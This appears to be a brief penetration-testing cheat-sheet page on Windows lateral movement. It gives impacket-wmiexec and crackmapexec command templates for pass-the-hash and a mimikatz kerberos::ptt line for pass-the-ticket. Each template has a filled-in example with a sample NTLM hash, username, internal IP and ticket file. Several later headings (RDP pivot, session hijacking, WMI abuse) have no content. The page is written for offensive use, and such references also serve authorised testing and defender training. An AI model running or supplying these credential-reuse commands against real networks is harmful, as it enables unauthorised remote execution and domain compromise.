Lateral movement
Pass-the-Hash (PtH)
impacket-wmiexec <domain>/<user>@<ip> -hashes <LM>:<NT>
# impacket-wmiexec -hashes :4de2bbb92b158793ba49e0becabb0aa0 'rahul.Dhawan'@10.10.10.12
cme smb <ip> -u <user> -H <NTLM_hash>Pass-the-Ticket (PtT)
kerberos::ptt <ticket.kirbi>
# kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbiOverpass-the-Hash (Pass-the-Key)
WMExec / PSExec / WinRM
Session Hijacking
RDP Pivot
WMI Event Subscription or Scripting Abuse
Last updated